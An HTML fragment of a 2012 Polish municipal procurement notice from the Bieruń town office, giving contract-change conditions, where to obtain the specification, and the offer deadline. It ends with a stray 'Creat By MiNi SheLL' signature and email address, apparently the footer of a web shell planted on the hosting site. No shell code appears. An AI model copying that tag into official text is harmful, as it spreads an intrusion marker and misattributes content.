<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmiany istotnych postanowień zawartej z wykonawcą umowy w zakresie:
a.  wartości umownej, w przypadku wprowadzenia zmian VAT, który będzie naliczany  zgodnie   z obowiązującą stawką;
b. mającym wpływ na realizację przedmiotu umowy, w przypadku gdy nastąpi zmiana powszechnie obowiązujących przepisów prawa; 
c. innych zmian, których nie można było przewidzieć na etapie sporządzania SIWZ, a które nie    wykraczają poza zakres art. 140 ustawy Prawo zamówień publicznych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bierun.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Bieruniu - Referat Zamówień Publicznych
43-150 Bieruń, ul. Rynek 14.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.02.2012 godzina 12:00, miejsce: Urząd Miejski w Bieruniu - kancelaria (parter)
43-150 Bieruń, ul. Rynek 14.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com